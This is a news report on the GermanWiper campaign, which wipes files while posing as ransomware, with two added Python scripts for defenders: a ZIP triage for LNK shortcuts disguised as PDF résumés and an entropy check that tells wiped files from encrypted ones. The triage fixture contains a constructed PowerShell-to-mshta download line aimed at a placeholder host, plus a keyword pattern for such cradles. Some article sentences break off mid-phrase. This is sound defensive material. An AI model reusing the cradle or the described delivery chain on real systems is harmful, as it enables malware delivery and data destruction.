The messages carry the subject “Ihr Stellenangebot – Bewerbung [Your job offer – Application] – Lena Kretschmer” and an attachment named “Unterlagen_Lena_Kretschmer.zip”.
The attached archive contains two files posing as the sender's PDF résumés; they are actually Windows shortcuts (LNK) that execute a PowerShell command to download an HTA file from the
The HTA then downloads the ransomware executable, saves it in the C:\Users\Public folder under a file name composed of three letters, and launches GermanWiper.
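The delivery chain above (a ZIP whose "résumés" are really LNK shortcuts that invoke PowerShell to fetch an HTA) can be caught at the mail gateway by checking member content rather than file names. The following Python is an added example, not code from the article or from any of the cited researchers: it builds a constructed ZIP in memory, flags any member whose name suggests a PDF but whose bytes start with the Shell Link header, and looks for download-cradle keywords in the shortcut's argument string. All member names, the fake shortcut payload and the example.invalid URL are constructed samples.

```python
"""Triage of a ZIP attachment for LNK shortcuts posing as PDF résumés.

Added example (not from the original article). Member names, the fake
shortcut bytes and the URL are constructed samples.
"""
import io
import re
import zipfile

# Every LNK file starts with HeaderSize 0x4C followed by the LinkCLSID
# 00021401-0000-0000-C000-000000000046 (MS-SHLLINK); this is a stable marker
# that a renamed extension cannot hide.
LNK_MAGIC = bytes.fromhex("4c000000" "01140200" "00000000" "c000000000000046")
PDF_MAGIC = b"%PDF"

# Keywords that usually appear when a shortcut's argument string is a cradle.
CRADLE_RE = re.compile(rb"(?i)(powershell|mshta|\.hta\b|DownloadFile|Invoke-WebRequest)")


def classify_member(name: str, data: bytes) -> dict:
    """Return a verdict for one archive member based on magic bytes, not extension."""
    lower = name.lower()
    looks_like_pdf = ".pdf" in lower          # also catches resume.pdf.lnk
    is_lnk = data.startswith(LNK_MAGIC)
    is_pdf = data.startswith(PDF_MAGIC)
    return {
        "name": name,
        "is_lnk": is_lnk,
        "is_pdf": is_pdf,
        "masquerade": is_lnk and looks_like_pdf,
        "cradle": bool(CRADLE_RE.search(data)) if is_lnk else False,
    }


def triage_zip(blob: bytes) -> list:
    """Open a ZIP from bytes and classify each member; nothing is written to disk."""
    results = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            # Cap the read so a decompression bomb cannot exhaust memory.
            with zf.open(info) as member:
                data = member.read(1_000_000)
            results.append(classify_member(info.filename, data))
    return results


def suspicious_members(blob: bytes) -> list:
    """Names of members that are LNK files dressed up as PDFs."""
    return [r["name"] for r in triage_zip(blob) if r["masquerade"]]


def build_sample_zip() -> bytes:
    """Constructed sample: one harmless PDF and two fake 'PDF' shortcuts."""
    # Constructed payload: a real LNK header followed by padding and a fake
    # argument string. It is not a working shortcut and carries no real URL.
    fake_lnk = (LNK_MAGIC + b"\x00" * 60
                + b"powershell.exe -Command mshta http://example.invalid/Unterlagen.hta")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Anschreiben_Lena_Kretschmer.pdf", b"%PDF-1.4\n%%EOF\n")
        zf.writestr("Lebenslauf_Lena_Kretschmer.pdf.lnk", fake_lnk)
        zf.writestr("Zeugnisse_Lena_Kretschmer.pdf.lnk", fake_lnk)
    return buf.getvalue()


if __name__ == "__main__":
    for verdict in triage_zip(build_sample_zip()):
        print(verdict)
```

Checking the header instead of the extension is the point: Explorer hides the `.lnk` suffix by default, so a name-based rule alone would pass these members through.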
The malicious code was first reported on the
Once it has infected a system, GermanWiper deletes files and leaves a ransom note demanding a payment of BTC 0.15038835.
The operators behind this campaign nevertheless tell victims that their data was encrypted rather than deleted, and they use a set of Bitcoin addresses to collect the payment.
In reality, the malware simply overwrites the content of each file with zeroes and ones; nothing is encrypted.
“The first sample seen by security researchers was built on Monday, July 29. The ID Ransomware service started to receive submissions the same day, a little after 10 AM CEST, MalwareHunterTeam told BleepingComputer,” BleepingComputer reported.
The following graph shows the number of submissions for GermanWiper to the ID Ransomware service, suggesting the activity is still ongoing.
Experts at BleepingComputer published several details about the wiper. When the malware is launched, it attempts to terminate processes associated with various software (e.g. notepad.exe, mysql.exe
The wiper skips files that Windows needs in order to run; it appends a random 5-character extension to the names of the wiped files to make the victim believe they have been encrypted by ransomware.
Once the deletion process is complete, GermanWiper also removes the shadow volume copies and disables Windows automatic startup repair.
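Because the files are overwritten with zeroes and ones rather than encrypted, an incident responder can tell a wiper from real ransomware before anyone considers paying: ciphertext is close to 8 bits of entropy per byte, while a 0/1 fill is close to 1 bit or less. The Python below is an added example, not from the article or from the researchers it cites; it builds a constructed sample directory in a temp folder, selects files by the random 5-character extension described above (assumed here to be alphanumeric), and classifies each by byte entropy. The file names, the extensions and the use of os.urandom as a stand-in for ciphertext are constructed.

```python
"""Telling a wiper from ransomware by inspecting the renamed files.

Added example (not from the article). Sample files, extensions and the
random stand-in for ciphertext are constructed.
"""
import math
import os
import random
import re
import tempfile
from collections import Counter
from pathlib import Path

# Assumption: the appended extension is 5 alphanumeric characters.
WIPER_EXT_RE = re.compile(r"\.[A-Za-z0-9]{5}$")
ENCRYPTED_THRESHOLD = 7.0   # bits per byte; real ciphertext sits near 7.99
SAMPLE_BYTES = 65536        # analyse only the head of each file


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty or constant input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify_file(path: Path) -> str:
    """'wiped' if the head looks like a 0/1 fill, 'encrypted-like' if it looks random."""
    with path.open("rb") as fh:
        head = fh.read(SAMPLE_BYTES)
    # A fill built from 0x00/0x01 bytes uses at most two symbols; cipher
    # output uses nearly all 256 values and scores near 8 bits per byte.
    if set(head) <= {0x00, 0x01, 0xFF} or shannon_entropy(head) < ENCRYPTED_THRESHOLD:
        return "wiped"
    return "encrypted-like"


def triage_directory(root: Path) -> dict:
    """Map each file carrying the random 5-char extension to a verdict."""
    verdicts = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and WIPER_EXT_RE.search(path.name):
            verdicts[path.name] = classify_file(path)
    return verdicts


def summarize(verdicts: dict) -> dict:
    """Count verdicts; a majority of 'wiped' means paying cannot recover the data."""
    return {"wiped": sum(v == "wiped" for v in verdicts.values()),
            "encrypted-like": sum(v == "encrypted-like" for v in verdicts.values())}


def build_sample_dir() -> Path:
    """Constructed samples: two wiped files, one random file, one untouched system file."""
    root = Path(tempfile.mkdtemp(prefix="wiper-triage-"))
    rng = random.Random(1)
    zeros_and_ones = bytes(rng.choice((0, 1)) for _ in range(20000))
    (root / "Bilanz.xlsx.k7pq2").write_bytes(zeros_and_ones)
    (root / "Vertrag.docx.a9z3m").write_bytes(b"\x00" * 20000)
    # os.urandom stands in for real ciphertext: indistinguishable by entropy.
    (root / "Foto.jpg.x1b4c").write_bytes(os.urandom(20000))
    (root / "ntoskrnl.exe").write_bytes(b"MZ" + b"\x90" * 100)   # left alone by the wiper
    return root


if __name__ == "__main__":
    sample_root = build_sample_dir()
    results = triage_directory(sample_root)
    for name, verdict in results.items():
        print(f"{name:28s} {verdict}")
    print(summarize(results))
```

Run this against a copy of the affected share, not the original; the extension filter keeps the scan away from files the wiper skipped, and the entropy check gives a verdict even when the ransom note and the renamed files are designed to look like an encryption event.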
Experts noticed that GermanWiper shares some similarities with a variant of the Sodinokibi ransomware that was involved in a recent spam campaign impersonating the BSI.
Furthermore, the same delivery method used by Sodinokibi (malicious shortcut files masquerading as PDFs, and the use of an HTA to extract and deploy the malware) is also observed in the GermanWiper attacks.
The German CERT also warned of the GermanWiper campaign.
Further technical details are available in the analysis published by BleepingComputer.